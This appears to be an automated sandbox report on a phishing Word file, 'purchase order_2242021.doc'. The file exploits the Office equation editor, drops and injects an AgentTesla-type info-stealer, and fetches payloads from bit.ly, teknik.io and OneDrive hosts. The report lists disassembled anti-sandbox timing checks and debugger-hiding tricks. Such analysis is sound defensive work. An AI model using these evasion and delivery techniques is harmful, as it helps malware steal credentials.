            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3918 second address: 00000000005D3918 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F957CAC2328h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F957CAC2332h 0x0000001f cmp bx, bx 0x00000022 cmp bx, dx 0x00000025 pop ecx 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F957CAC22F7h 0x0000002e cmp ah, bh 0x00000030 test cl, dl 0x00000032 push ecx 0x00000033 call 00007F957CAC23A9h 0x00000038 call 00007F957CAC2338h 0x0000003d lfence 0x00000040 mov edx, dword ptr [7FFE0014h] 0x00000046 lfence 0x00000049 ret 0x0000004a mov esi, edx 0x0000004c pushad 0x0000004d rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D38DF second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c pushad 0x0000000d mov bx, 2AB1h 0x00000011 cmp bx, 2AB1h 0x00000016 jne 00007F957C382536h 0x0000001c popad 0x0000001d ret 0x0000001e jmp 00007F957C3859D2h 0x00000020 test dx, ax 0x00000023 jmp 00007F957C3859D2h 0x00000025 cmp eax, edx 0x00000027 jmp 00007F957C3859D2h 0x00000029 test bl, bl 0x0000002b jmp 00007F957C3859D2h 0x0000002d test dh, dh 0x0000002f mov dword ptr [ebp+0000009Ch], 00000000h 0x00000039 jmp 00007F957C3859D2h 0x0000003b test bx, ax 0x0000003e xor edi, edi 0x00000040 jmp 00007F957C3859D2h 0x00000042 test bl, 00000069h 0x00000045 mov ecx, 000186A0h 0x0000004a jmp 00007F957C3859D2h 0x0000004c test dx, ax 0x0000004f jmp 00007F957C3859D2h 0x00000051 cmp eax, edx 0x00000053 test dx, cx 0x00000056 cmp bx, dx 0x00000059 push ecx 0x0000005a call 00007F957C385A62h 0x0000005f call 00007F957C385A22h 0x00000064 lfence 0x00000067 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3A7D second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test cl, 00000016h 0x0000000d add dword ptr [ebp+0000009Ch], 01h 0x00000014 jmp 00007F957C3859D2h 0x00000016 test eax, ecx 0x00000018 add edi, edx 0x0000001a dec ecx 0x0000001b cmp ecx, 00000000h 0x0000001e jne 00007F957C385959h 0x00000020 cmp bx, dx 0x00000023 push ecx 0x00000024 call 00007F957C385A62h 0x00000029 call 00007F957C385A22h 0x0000002e lfence 0x00000031 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3473 second address: 00000000005D5189 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c test ch, ah 0x0000000e jmp 00007F957C387110h 0x00000013 call 00007F957C384277h 0x00000018 pop eax 0x00000019 cmp ax, dx 0x0000001c push edi 0x0000001d push eax 0x0000001e call 00007F957C387693h 0x00000023 jmp 00007F957C3859D2h 0x00000025 pushad 0x00000026 mov ebx, 000000ACh 0x0000002b rdtsc
            Tries to detect Any.runShow sources
            Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3918 second address: 00000000005D3918 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F957CAC2328h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F957CAC2332h 0x0000001f cmp bx, bx 0x00000022 cmp bx, dx 0x00000025 pop ecx 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F957CAC22F7h 0x0000002e cmp ah, bh 0x00000030 test cl, dl 0x00000032 push ecx 0x00000033 call 00007F957CAC23A9h 0x00000038 call 00007F957CAC2338h 0x0000003d lfence 0x00000040 mov edx, dword ptr [7FFE0014h] 0x00000046 lfence 0x00000049 ret 0x0000004a mov esi, edx 0x0000004c pushad 0x0000004d rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D38DF second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c pushad 0x0000000d mov bx, 2AB1h 0x00000011 cmp bx, 2AB1h 0x00000016 jne 00007F957C382536h 0x0000001c popad 0x0000001d ret 0x0000001e jmp 00007F957C3859D2h 0x00000020 test dx, ax 0x00000023 jmp 00007F957C3859D2h 0x00000025 cmp eax, edx 0x00000027 jmp 00007F957C3859D2h 0x00000029 test bl, bl 0x0000002b jmp 00007F957C3859D2h 0x0000002d test dh, dh 0x0000002f mov dword ptr [ebp+0000009Ch], 00000000h 0x00000039 jmp 00007F957C3859D2h 0x0000003b test bx, ax 0x0000003e xor edi, edi 0x00000040 jmp 00007F957C3859D2h 0x00000042 test bl, 00000069h 0x00000045 mov ecx, 000186A0h 0x0000004a jmp 00007F957C3859D2h 0x0000004c test dx, ax 0x0000004f jmp 00007F957C3859D2h 0x00000051 cmp eax, edx 0x00000053 test dx, cx 0x00000056 cmp bx, dx 0x00000059 push ecx 0x0000005a call 00007F957C385A62h 0x0000005f call 00007F957C385A22h 0x00000064 lfence 0x00000067 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3B4F second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F957CAC4627h 0x0000001d popad 0x0000001e call 00007F957CAC236Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3A7D second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test cl, 00000016h 0x0000000d add dword ptr [ebp+0000009Ch], 01h 0x00000014 jmp 00007F957C3859D2h 0x00000016 test eax, ecx 0x00000018 add edi, edx 0x0000001a dec ecx 0x0000001b cmp ecx, 00000000h 0x0000001e jne 00007F957C385959h 0x00000020 cmp bx, dx 0x00000023 push ecx 0x00000024 call 00007F957C385A62h 0x00000029 call 00007F957C385A22h 0x0000002e lfence 0x00000031 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D534E second address: 00000000005D534E instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov dx, word ptr [esi+ecx] 0x0000000f jmp 00007F957CAC2332h 0x00000011 test dh, 00000068h 0x00000014 cmp bx, dx 0x00000017 jne 00007F957CAC2293h 0x0000001d push dword ptr [esp+04h] 0x00000021 jmp 00007F957CAC2332h 0x00000023 test bx, ax 0x00000026 call 00007F957CAC2555h 0x0000002b mov ebx, dword ptr [esp+04h] 0x0000002f xor ecx, ecx 0x00000031 add ecx, 02h 0x00000034 cmp word ptr [ebx+ecx], 0000h 0x00000039 jne 00007F957CAC2318h 0x0000003b add ecx, 02h 0x0000003e cmp word ptr [ebx+ecx], 0000h 0x00000043 jne 00007F957CAC2318h 0x00000045 add ecx, 02h 0x00000048 cmp word ptr [ebx+ecx], 0000h 0x0000004d jne 00007F957CAC2318h 0x0000004f add ecx, 02h 0x00000052 cmp word ptr [ebx+ecx], 0000h 0x00000057 jne 00007F957CAC2318h 0x00000059 add ecx, 02h 0x0000005c cmp word ptr [ebx+ecx], 0000h 0x00000061 jne 00007F957CAC2318h 0x00000063 add ecx, 02h 0x00000066 cmp word ptr [ebx+ecx], 0000h 0x0000006b jne 00007F957CAC2318h 0x0000006d add ecx, 02h 0x00000070 cmp word ptr [ebx+ecx], 0000h 0x00000075 jne 00007F957CAC2318h 0x00000077 retn 0004h 0x0000007a jmp 00007F957CAC2332h 0x0000007c cmp dh, dh 0x0000007e sub ecx, 02h 0x00000081 add eax, 02h 0x00000084 jmp 00007F957CAC2332h 0x00000086 cmp dl, cl 0x00000088 mov bx, word ptr [eax+ecx] 0x0000008c jmp 00007F957CAC2332h 0x0000008e pushad 0x0000008f lfence 0x00000092 rdtsc
            Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000005D3473 second address: 00000000005D5189 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c test ch, ah 0x0000000e jmp 00007F957C387110h 0x00000013 call 00007F957C384277h 0x00000018 pop eax 0x00000019 cmp ax, dx 0x0000001c push edi 0x0000001d push eax 0x0000001e call 00007F957C387693h 0x00000023 jmp 00007F957C3859D2h 0x00000025 pushad 0x00000026 mov ebx, 000000ACh 0x0000002b rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000093B4F second address: 0000000000093B4F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F957CAC4627h 0x0000001d popad 0x0000001e call 00007F957CAC236Ah 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009381F rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2412Thread sleep time: -420000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3008Thread sleep time: -300000s >= -30000s
            Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformation

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\Public\69577.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\69577.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009381F rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000959F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009640D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009643D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096432 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096451 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096499 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000955CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000936C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\Public\69577.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 90000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
            Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612
            Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000938DD cpuid
            Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2464, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Spearphishing Link1Exploitation for Client Execution13Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion22LSASS MemorySecurity Software Discovery621Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion22SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery213Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 357325 Sample: purchase order_2242021.doc Startdate: 24/02/2021 Architecture: WINDOWS Score: 100 40 Multi AV Scanner detection for dropped file 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected GuLoader 2->44 46 11 other signatures 2->46 8 EQNEDT32.EXE 17 2->8         started        13 WINWORD.EXE 291 26 2->13         started        process3 dnsIp4 34 teknik.io 5.79.72.163, 443, 49168 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 8->34 36 bit.ly 67.199.248.11, 49167, 80 GOOGLE-PRIVATE-CLOUDUS United States 8->36 38 u.teknik.io 8->38 24 C:\Users\user\AppData\Local\...\PWua8[1].txt, PE32 8->24 dropped 26 C:\Users\Public\69577.exe, PE32 8->26 dropped 54 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->54 15 69577.exe 1 8->15         started        file5 signatures6 process7 signatures8 56 Multi AV Scanner detection for dropped file 15->56 58 Writes to foreign memory regions 15->58 60 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 15->60 62 3 other signatures 15->62 18 RegAsm.exe 12 15->18         started        process9 dnsIp10 28 onedrive.live.com 18->28 30 cbzrfq.bl.files.1drv.com 18->30 32 bl-files.fe.1drv.com 18->32 48 Tries to detect Any.run 18->48 50 Tries to detect virtualization through RDTSC time measurements 18->50 52 Hides threads from debuggers 18->52 22 dw20.exe 18->22         started        signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            purchase order_2242021.doc43%VirustotalBrowse
            purchase order_2242021.doc28%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt12%ReversingLabsWin32.Trojan.Remcos
